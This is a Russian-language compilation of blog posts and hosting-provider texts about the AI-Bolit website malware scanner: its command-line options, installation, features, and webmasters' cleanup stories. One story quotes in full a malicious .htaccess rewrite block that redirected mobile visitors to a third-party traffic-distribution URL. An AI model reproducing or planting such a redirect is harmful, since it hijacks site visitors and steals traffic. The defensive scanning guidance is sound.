Наибольший функционал доступен при запуске сканера AI-BOLIT в режиме командной строки. Это можно делать как под Windows/Unix/Mac OS X, так и непосредственно на хостинге, если у вас есть доступ по SSH и хостинг не сильно ограничивает потребляемые ресурсы процессора.
Обращаем внимание, что для запуска сканера требуется консольная версия PHP 7.1 и выше. Более ранние версии официально не поддерживаются. Проверьте текущую версию командой php -v
Справка по параметрам командной строки сканера AI-BOLIT
Показать помощь
php ai-bolit.php --help
php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov
Просканировать только определенные расширения
php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl
Подготовить файл карантина для отправки специалистам по безопасности. Будет создан архив AI-QUARANTINE-XXXX.zip с паролем.
php ai-bolit.php --quarantine
Запустить сканер в режиме "параноидальный" (рекомендуется для получения максимально-детализированного отчета)
php ai-bolit.php --mode=2
php ai-bolit.php --mode=1
Проверить один файл "pms.db" на вредоносный код
php ai-bolit.php -jpms.db
Запустить сканер с размером памяти 512Mb
php ai-bolit.php --memory=512M
Установить максимальный размер проверяемого файла 900Kb
php ai-bolit.php --size=900K
Делать паузу 500ms между файлами при сканировании (для снижения нагрузки)
php ai-bolit.php --delay=500
Отправить отчет о сканировании на email [email protected]
php ai-bolit.php [email protected]
Создать отчет в файле /home/scanned/report_site1.html
php ai-bolit.php --report=/home/scanned/report_site1.html
Просканировать директорию /home/s/site1/public_html/ (отчет по-умолчанию будет создан в ней же, если не задана опция --report=файл_отчета)
php ai-bolit.php --path=/home/s/site1/public_html/
Выполнить команду по завершении сканирования.
php ai-bolit.php --cmd="~/postprocess.sh"
Получить отчет в текстовом виде (plain-text) с именем site1.txt
php ai-bolit.php -lsite1.txt
Можно комбинировать вызовы, например,
php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected
Комбинируя вызов сканера AI-BOLIT c другими командами unix, можно выполнять, например, пакетную проверку сайтов. Ниже приведем пример проверки нескольких сайтов, размещенных внутри аккаунта. Например, если сайты размещены внутри директории /var/www/user1/data/www, то команда на запуск сканера будет
find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path={} --mode=2 \;
Добавив параметр --report можно управлять каталогом, в котором будут создаваться отчеты о сканировании.
php ai-bolit.php список параметров … --eng
Переключить интерфейс отчета на английский. Данный параметр должен идти последним.
Интеграция с другими сервисами и в панель хостинга
php ai-bolit.php --json_report=/path/file.json
Cформировать отчет в формате json
php ai-bolit.php --progress=/path/progress.json
Cохранять статус проверки в файл в формате json. Данный файл будет содержать структурированные данные в формате json: текущий файл проверки, сколько файлов проверено, сколько файлов осталось проверить, процент проверки, время до завершения сканирования. Данный механизм можно использовать, чтобы в панели показывать прогресс-бар и данные о проверяемых файлах. По завершении сканирования файл удаляется автоматически.
php ai-bolit.php --handler=/path/hander.php
Внешний обработчик событий. Вы можете добавить собственные обработчики начала/завершения сканирования/прогресса сканирования/ошибки сканирования. Пример файла можно посмотреть в архиве сканера, в каталоге tools/handler.php. Например, по завершении сканирования можно что-то сделать с файлом отчета (отправить по почте, запаковать в архив и пр).
Недавно на одном из своих проектов я заметил срабатывание редиректа на сторонний рекламный ресурс. Это не такой явный хак сайта когда тот полностью перестает работать, а скрытый способ воровства трафика. Например, злоумышленник может перенаправлять только пользователей с мобильных устройств или сделать срабатывание скрипта непостоянным дабы владелец проекта не заметил потерю аудитории. Как бы там ни было, это все не очень хорошо для вашего сайта как с точки зрения посетителей, которые не попадают на нужные страницы, так и может вызывать проблемы со стороны поисковиков, если вдруг редирект идет на источник с вирусами.
Сегодня рассмотрим один полезный PHP скрипт AI Bolit который позволяет найти вирусы на хостинге дабы избавиться от разного вредоносного кода. Решение полностью бесплатное и не сложное в работе.
У данного скрипта есть 3 варианта релизов:
- AI Bolit под Windows — позволяет провести анализ сайт локально, предварительно скачав его на компьютер.
- Классический вариант для проверки хостинга на вирусы (подойдет также для Unix и Mac OS X).
- Новый веб-сканер (ReScan.pro) — проводит проверку страниц сайта онлайн.
Последний вариант, как вы понимаете, самый простой однако он не смотрит непосредственно файлы, находящиеся на хостинге, а лишь выборочно сканирует некоторые веб-страницы. Такая поверхностная проверка не может подсказать вам конкретный источник проблемы на сайте, но поможет ее обнаружить.
Некоторым пользователям наиболее привычными и простым кажется вариант скрипта AI Bolit для Windows, т.к. многие работают с этой ОС. Однако я бы все же рекомендовал выполнять проверку вирусов на хостинге. Здесь нет ничего сложного, и ниже подробнее об этом всем расскажу.
Принцип работы и особенности AI Bolit
Чтобы использовать AI Bolit вам нужно выполнить следующие действия:
- Скачать скрипт с сайта программы .
- Распаковать и залить его на хостинг.
- Запустить AI Bolit как указано в документации.
- После выполнения проверки получаете результат анализа сайта.
- Дальше вы можете самостоятельно исправить проблемы или обратиться за помощью к специалистам.
Последний пункт объясняет почему столь классный и мощный php скрипт AI Bolit распространяется бесплатно. Думаю, после нахождения проблем и вирусов на хостинге многие пользователи обращаются к разрабочтикам за последующими услугами. Вполне логичный подход. Решение, кстати, запатентовано и обладает уникальным алгоритмом, а популярніе ру-хостинги рекомендуют/используют его в работе. Помнится, когда-то обращался за помощью в тех.поддержку хостера по поводу проблем с одним сайтом, так они запускали проверку хостинга на вирусы именно с помощью AI Bolit. После того случая я и узнал о существовании данного решения:)
Основные плюсы и фишки AI Bolit:
- поиск разных типов вредоносных кодов: вирусы, шеллы, бэкдоры, публичные уязвимости в скриптах;
- бесплатное распространение;
- использование специального запатентованного эвристический анализа;
- относительно не сложная установка и настройка;
- актуальная база вирусов и вредоносных скриптов;
- проверка хостинга на вирусы для любых сайтов и CMS;
- работа с разными ОС: Windows, Unix, MacOS;
- рекомендации от ведущих хостинг-компаний.
Как пользоваться AI Bolit
1. Скрипт AI Bolit скачать можно пройдя по данной ссылке на сайте с его описанием. Там рекомендуется выбирать именно универсальную версию(!) для проверки хостинга на вирусы. После этого начнется автоматическое скачивание файла ai-bolit.zip.
2. Следующий шаг — распаковка и загрузка на хостинг. Для работы с FTP я использую бесплатную программу FileZilla (отличный ФТП клиент). После разархивации ai-bolit.zip найдете внутри документацию по установке в файле readme.txt. Если хотите, можете с ней ознакомиться.
| define ("PASS" , "????????????????????" ) ; |
define("PASS", "????????????????????");
И вписываете вместо символов??? свое значение. Файл сохраняете.
4. Затем копируете все содержимое папки /ai-bolit/ на свой хостинг в корневую директорию (например, для WP это там, где находится wp-config).
5. После загрузки скрипта на сервер нужно запустить AI Bolit по ссылке в адресной строке вашего браузера:
https://адрес_вашего_сайта/ai-bolit.php?p=ваш_пароль
Через некоторое время получите отчет поиска вирусов на хостинге.
В данном примере видимо, что проверка обнаружила подозрительный редирект для мобильных устройств, находящийся в haccess, но я добавлял его самостоятельно. Также были найдены сторонние коды в некоторых файлах шаблона (на скриншоте их нет, т.к. уже все почистил).
6. После того как сканер AI Bolit завершил свою работу вам нужно обязательно удалить все его файлы с FTP (которые вы загружали на 4-том шаге) вместе с отчетом.
Напоследок хочется заметить, что в скрипте имеется 2 режима проверки: экспресс и «параноидальный» . В первом случае проверяются только js, php, html файлы и htaccess, а второй позволяет запустить AI Bolit на полную. Для этого в файле настроек ai-bolit.php поставьте значение переменной ‘scan_all_files’ => 1 либо используйте для запуска скрипта ссылку с дополнительным параметром:
https://адрес_вашего_сайта/ai-bolit.php?p=ваш_пароль&full
В документации сказано, что перед повторным запуском надо удалить AI-BOLIT-DOUBLECHECK.php, хотя лично у меня на ФТП такого файла не было. В readme.txt также найдете информацию как проверить на вирусы сайт на хостинге через SSH. Алгоритм действий похожий, но после копирования всех файлов скрипта на FTP запускаете его командой:
| php ai-bolit.php |
php ai-bolit.php
В итоге автоматически будет создан файл AI-BOLIT-REPORT-<дата>-<время>.html с результати проверки. В принципе, ничего сложного нет, но дополнительные ответы на вопросы можете глянуть в FAQ.
В целом у меня получилось проверить сайт на вирусы с AI Bolit достаточно легко — проблему обнаружил и ликвидировал за минут 10. Скачивается сканер бесплатно отсюда , затем нужно настроить и запустить AI Bolit по специальной ссылке в браузере, после чего просмотреть результаты. Как исправлять вирусы, бэкдоры и шеллы — это уже несколько иной вопрос. В самом простом случае (как у меня с редиректом) — просто удаляете вредоносный код из файлов. Если плохо в этом разбираетесь или задача слишком сложная, можно запросить платную консультацию/услугу у разработчиков срипта. Они помогут не только с удалением вируса на хостинге, но и улучшат его защиту.
Неприятные ситуации застают нас врасплох. Порой, некоторые пользователи устанавливают на свои сайты программное обеспечение, которое имеет уязвимости . Или же злоумышленники находят «дыры» в программном обеспечении, которое свободно распространяется. После обнаружения таких «дыр» хакеры начинают эксплуатировать аккаунт жертвы и внедрять на сайт вредный программный код, всяческие хакерские шеллы, бэкдоры, спам-рассыльщики и другие вредоносные скрипты.
Увы, некоторые пользователи вовремя не обновляют программное обеспечения на своих сайтах и становятся жертвами таких злоумышленников
Суть проблемы
Наше серверное программное обеспечение в большинстве случаев идентифицирует вредную нагрузку и автоматически ликвидирует «плохую» активность.
Что конкретно делает вредное программное обеспечение? Очень разные вещи: рассылает спам, участвует в атаках на другие ресурсы и прочее… Одним из ярких примеров таких вирусов является «MAYHEM - многоцелевой бот для *NIX-серверов». Об этом вирусе, например, очень популярно объясняют специалисты компании Яндекс в своем блоге или
Hostland постоянно радует своих клиентов новым инструментарием для борьбы с вирусами!
Мы представляем вам очень удобный и бесплатный инструмент для поиска вирусов, вредоносных и хакерских скриптов на вашем аккаунте, шеллов по сигнатурам и гибким паттернам, шеллов на основе несложной эвристики - все то, что обычные антивирусы и сканеры найти не могут.
Мы представляем своим пользователя «AI-Bolit » от компании «Ревизиум»
Возможности сканера AI-Bolit:
- Поиск хакерских php и perl скриптов (шеллов, бэкдоров), вирусных вставок, дорвеев, спам-рассыльщиков, скриптов по продаже ссылок, скриптов клоакинга и других типов вредоносных скриптов. Поиск по шаблонам и регулярным выражениям, а также использование несложных эвристик для определения потенциально-вредоносного кода
- Поиск скриптов с критическими уязвимостями (timthumb.php, uploadify, fckeditor, phpmyadmin, и других)
- Поиск скриптов, которые не характерны для сайтов на php (.sh, .pl, .so и др)
- Поиск сигнатур в зашифрованных, фрагментированных текстовых блоках и закодированных hex/oct/dec последовательностях
- Поиск подозрительных файлов с конструкциями, которые применяются во вредоносных скриптах
- Поиск скрытых ссылок в файлах
- Поиск символических ссылок
- Поиск кода поисковых и мобильных редиректов
- Поиск подключений вида auto_prepend_file/auto_append_file, AddHandler
- Поиск iframe вставок
- Определение версии и типа cms
- Поиск скрытых файлов
- Поиск.php файлов с двойными расширениями, .php файлов, загруженных как GIF картинка
- Поиск дорвеев и каталогов, содержащих подозрительно большое число php/html файлов
- Поиск исполняемых двоичных файлов
- Удобная фильтрация и сортировка списков файлов в отчете
- Интерфейс на русском языке
Что еще важно знать?
Если на вашем аккаунте с помощью «AI-Bolit» было найдено зловредное программное обеспечение, то просто удалив эти файлы вы не решите проблемы уязвимости вашего сайта.
Вам необходимо выяснить, как хакер смог внедрить «плохой» скрипт к вам на сайт, найти «дыру» в своем программном обеспечении. Иногда для этого необходимо поменять пароли к FTP доступу, обновить «движок сайта», иногда необходимо изучить лог файлы сервера (если они выключены - включить их), иногда же нужно привлечь стороннего специалиста по безопасности.
А весь комплекс вышеуказанных мер будет наилучшим подспорьем в решении проблемы безопасности вашего сайта!
Невозможно гарантировать обнаружение всех вредоносных скриптов. Поэтому разработчик сканера и хостинг провайдер не несет ответственности за возможные последствия ложных срабатываний при работе сканера AI-Bolit или неоправданные ожидания пользователей относительно функциональности и возможностей.
Замечания и предложения по работе скрипта, а также не обнаруженные вредоносные скрипты вы можете присылать на [email protected]
Вы уверены, что ваши сайты не заражены вирусами? Вы проверили сайт в онлайн антивирусе? Забудьте, онлайн антивирусы не смогут никогда найти вирусы, вшитые в ваш сайт умелыми хакерами.
Максимум, что они смогут, так это определить вредоносные скрипты, которые вы сами по неосмотрительности установили на своём сайте. Поэтому нужны более радикальные методы проверки сайта на вирусы, которые смогут не просто проскакать по вершкам, а заглянуть внутрь вашего проекта.
Как проверить сайт на вирусы платно и бесплатно?
В этой статье будет рассказано о нескольких способах проверить свой сайт на вирусы:
Онлайн антивирусы — самый простой, но при этом и самый ненадежный способ.
Антивирус Айболит — самый надежный, но и самый сложный способ.
Сайт антивирус Вирусдай — самый оптимальный вариант.
Но сначала немного о том, чем опасен вирус на сайте.
Чем опасен взлом сайта?
Но вначале немного теории и личного опыта — ломали меня не раз. Зачем сайт заражают вирусом? Получив доступ к вашему сайту злоумышленники могут выполнить следующее:
Начнут «сливать» ваш трафик на свои проекты.
Скачают содержимое сервера и базы данных для продажи третьим лицам.
Подменят контактные или платежные данные на сайте, скачают персональные данные пользователей.
Разместят на вашем сайте дорвеи со спам-ссылками.
Внедрят на страницы сайта вирусы, трояны или эксплойты, заражая посетителей.
Проведут с вашего сервера спам-рассылку.
Продадут доступ к взломанному сайту другим злоумышленникам для последующего несанкционированного проникновения.
Важно понимать: сайты с вирусами могут попасть под санкции поисковых систем и потерять позиции. Мой хостинг уже не раз бомбили хакеры, обрушивая на него . Для чего это делается? Цель банальна: получить доступ к вашим паролям или залить вирус на ваш сайт через уязвимость в коде.
И это им удаётся, так как уже два раза я удалял залитые ими дорвеи со своих сайтов. Но это пол беды, так как мои сайты были инфицированы после этого, и даже смена паролей мало что даёт при этом. И гарантий, что всё не повторится, просто нет.
Потом, когда я опять ввожу адрес, я захожу на сайт и в админку в том числе. Что за беда, до сих пор не знаю. На этом сайте, самом моём последнем, такого нет. Так и под DDOS атаки он ещё не попадал….
Самый простой способ вылечить сайт — это снести всё и установить скрипт сайта заново . Но, как понимаете, это крайняя мера, к которой нужно прибегать только в крайнем случае. Да и к тому же вредоносный код могут вшить в шаблон, а его не заменишь. Поэтому для начала нужно попробовать определить, заражён ли наш сайт или нет? Как это сделать?
Где проверить сайт на вирусы онлайн?
Проверка сайта на вирусы онлайн — хотя этот метод не самый эффективный, как я и написал выше, можно начать с него. Есть неплохой сервис Antivirus Alarm .
Просто вводим адрес сайта и ждем, пока сервис проверит ваш сайт на вирусы. Если он найдет что-то подозрительное, то выдаст это в отчете. Но если даже этот онлайн антивирус ничего не найдет, попробуйте более продвинутое решение.
Как проверить на вирусы сайт скриптом?
Буквально неделю назад я проверил все свои сайты антивирусом Айболит и обнаружил, что мой основной сайт инфицирован.
Что это за антивирус и как с ним работать?
Этот антивирус можно скачать с сайта разработчиков — Айболит . На данный момент есть версия для Windows, раньше можно было работать только через хостинг.
Что может этот антивирус для сайта ? Вот что:
— искать вирусы, вредоносные и хакерские скрипты на хостинге: шеллы по сигнатурам и гибким паттернам, шеллы на основе несложной эвристики — все то, что обычные — антивирусы и сканеры найти не могут.
— искать уязвимые скрипты timthumb, fckeditor, uploadify, и ряд других.
— искать редиректы в.htaccess на вредоносные сайты.
— искать код ссылочных бирж, таких как sape/trustlink/linkfeed/… в.php файлах
— определять каталоги и файлы дорвеев.
— искать пустые ссылки (невидимые ссылки) в шаблонах.
— показывать директории, открытые на запись.
— работать со всеми cms без исключения (joomla, wordpress, drupal, dle, bitrix, phpbb,…)
— отсылать отчет по email или сохранять в файл.
Установка проста: распаковываем архив и заливаем в папку с нашим сайтом файлы ai-bolit.php, .aignore, .aurlignore из папки ai-bolit и файл из папки known_files, который соответствует версии нашей CMS, в моём случае это.aknown.wp_3_8_1 для wordpress. Возможно, нужно будет задать правильные права на файлы, 755, например.
Ну а тем, у кого правильный хостинг, нужно войти в терминал (У меня линукс, поэтому никаких эмуляторов не нужно) и далее подключаемся к нашему хостингу через SSH.
Ssh ЛОГИН@АДРЕС_СЕРВЕРА
Как это делать точно, объяснять не буду, если вы не в теме, то тут нужен индивидуальный подход, пишите в комментариях, объясню.
После подключения нужно перейти при помощи команды cd в папку с сайтом. Далее даём команду:
Php ai-bolit.php
После этого начнётся сканирование, которое продлится достаточно долго, в зависимости от размера сайта. После окончания в папке с сайтом появится файл с примерным названием AI-BOLIT-REPORT-07-04-2014_23-10-719945.html
Открываем файл и анализируем, что да как. У меня выдало, к примеру, в самом начале:
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт: (12)
Но на самом деле оказалось, что вирус только один, а остальные срабатывания были на сертификаты, которые похожи на шифрованные записи.
Самый простой способ разобраться тут — это скачать чистый вордпресс, или что у вас там, и сравнивать подозрительные фалы. Если в оригинале все тоже самое, то волноваться не нужно. Ну а если нет, то удаляем вредоносный код. Далее у меня ругалось на:
Двойное расширение, зашифрованный контент или подозрение на вредоносный скрипт. Требуется дополнительный анализ: (14)
Ругался антивирус на один плагин — ТОП 10 — не уверен, что есть проблема. Так же и другие опасности были ложным срабатыванием.
Так же эвристический анализ заругался на файлы wordpress, но я сверил с оригиналами и всё было нормально.
В этих файлах размещены невидимые ссылки. Подозрение на ссылочный спам:
Тут я плагин, создающий кнопку ВВЕРХ — в нем была скрытая ссылка.
Хотя в отношении плагинов тут нужно понимать, что в них почти во всех есть ссылки. Но решается это элементарно, закрытием папки с плагинами от индексации. В wordpress это можно сделать, вписав в robot.txt строку Disallow: /wp-content/plugins
В каждом случае всё будет очень индивидуально, поэтому трудно написать что-то конкретное. Цель статьи больше состоит в том, чтобы дать направление.
Все бы тут хорошо, да не хватает одного — постоянного мониторинга. Каждый день запускать этот антивирус не будешь, а хакеры работают без выходных. И тут нам поможет другой отличный сервис. Как проверить на вирус сайт сервисом?
Автоматическая проверка сайта на вирусы
Не так давно появился сервис Вирусдай , который как раз может постоянно осуществлять мониторинг сайта на отсутствие вирусов. Выглядит все очень приятно и функционально, лечение сайтов от вирусов тут удобнее всего:
Нужно добавить к ним свой сайт и скачать php файл синхронизации, который заливается в корень сайта. Далее можно запустить синхронизацию и сервис проверит ваш сайт на вирусы.
В бесплатной версии возможности ограничены, поэтому если вам дорог ваш сайт, то можно немного заплатить и спать спокойно — сервис будет сам искать вирусы и тут же их лечить.
Ну вот, на одном сайте обнаружен вирус. Этот сайт как раз выносил грузил мне сервер, пока я не вырубил протокол удаленной публикации. Проблема исчезла, но вирус остался:
Ну что же, попробуем удалить заразу. Нет, не тут то было, сервис бесплатно удалять вирус не хочет, выдал лишь такую информацию:
Найденные угрозы : h.ExternalRedirect
В файле конфигурации WEB-сервера содержатся инструкции, условно или безусловно перенаправляющие пользователей сайта на сторонние ресурсы. Рекомендуется удаление .
Как удалить вирус, который я нашел на сайте? Попробую найти вручную, а может и подключусь на платный тариф, так как безопасность сайтов очень важна. Хотя, скорее всего, эту заразу я принес с шаред хостинга, теперь у меня отличный VPS и проблем особых не было. Итак, регистрируемся на Вирусдай и подключаем свой сайт.
Вот как проверить свой сайт на вирусы, если вы знаете еще способы, и даже лучше этих, то всем было бы интересно о них узнать…
Вчера у меня произошло не очень приятное происшествие — заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?
Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.
Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.
Я уже писал как то о том, но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.
Так как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.
Я тут же связался со службой поддержки хостинга:
— У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.
Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле.htaccess, который находится в корне сайта, я обнаружил вот такой код:
RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+mobile|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS
Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.
К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:
У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.
На что последовал ответ:
«Заразили» только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.
Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?
Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.
Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.
Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress — это тот же Windows, и что с этим делать ?
AI-Bolit - эффективный сканер вирусов и другого вредоносного кода на хостинге
Нас часто спрашивают – в чем уникальность сканера AI-Bolit ? Чем он отличается от других аналогичных инструментов поиска вредносного кода, таких как maldet, clamav или даже десктопных антивирусов? Краткий ответ – он лучше детектирует вредоносный код, написанный на PHP и Perl. Почему? Ответ ниже.
С каждым днем вредоносный код (хакерские веб-шеллы, бэкдоры и т.п.) становятся более изощренными и сложными. Кроме обфускаций идентификаторов и шифрования кода
повсеместно начали использоваться неявные вызовы функций посредством методов с callable аргументами, handler"ов и косвенных вызовов функций.
Все меньше остается вредоносных скриптов с линейной структурой и фиксированными идентификаторами. Код стараются замаскировать и сделать как можно более изменчивым, “полиморфным”
или наоборот, сделать максимально простым и похожим на обычный скрипт.
Порой, анализируя вредоносный скрипт, невозможно выделить фиксированный фрагмент, по которому однозначно можно было бы идентифицировать “вредонос”. Очевидно, что подобный вредоносный код невозможно найти по простой базе сигнатур (антивирусной базе), которая используется в подавляющем большинстве веб-антивирусов и сканеров на хостинге. Для эффективного поиска современных “вредоносов” необходимо использовать более сложные методики определения вирусных паттернов, а в некоторых случаях - эвристику. Именно такой подход мы применяем в сканере вредоносного кода AI-BOLIT.
Использование большой базы постоянно совершенствующихся гибких паттернов на основе регулярных выражений, применение дополнительного эвристического анализа, выработанного на основе сканирования большого числа зараженных сайтов, позволило сделать сканер AI-Bolit самым эффективным и активно используемым инструментом администратора и веб-разработчика.
Широкую известность AI-Bolit получил также благодаря простому интерфейсу и возможности свободного использования в некоммерческих целях. Любой вебмастер может абсолютно бесплатно скачать AI-Bolit с официального сайта http://revisium.com/ai/ и проверить свой ресурс на наличие хакерские шеллов, бэкдоров, дорвеев, вирусов, спам-рассыльщиков, скрытых ссылок и других вредоносных фрагментов и вставок. Сканер также активно используется и коммерческими компаниями - веб-студиями, хостинг-компаниями и интернет-агентствами для проверки и лечения клиентских сайтов. Хостеры интегрируют AI-Bolit в панель управления, веб-разработчики используют его для поиска вредоносного кода и в собственных сервисах мониторинга сайтов.
Ниже приведем лишь небольшой список возможностей сканера Ai-Bolit:
- запуск из консоли и браузера
- три режима сканирования ("простой", "эксперт", "параноидальный")и два режима работы ("экспресс" и "полное сканирование")
- поиск хакерских php и perl скриптов (шеллов, бэкдоров), вирусных вставок, дорвеев, спам-рассыльщиков, скриптов по продаже ссылок, скриптов клоакинга и других типов вредоносных скриптов. Поиск по шаблонам и регулярным выражениям, а также использование эвристик для определения потенциально-вредоносного кода
- поиск сигнатур в зашифрованных, фрагментированных текстовых блоках и закодированных hex/oct/dec последовательностях
- поиск подозрительных файлов с конструкциями, которые применяются во вредоносных скриптах
- поиск скрытых ссылок в файлах
- поиск символических ссылок
- поиск кода поисковых и мобильных редиректов и многое другое.
Официальная страница скрипта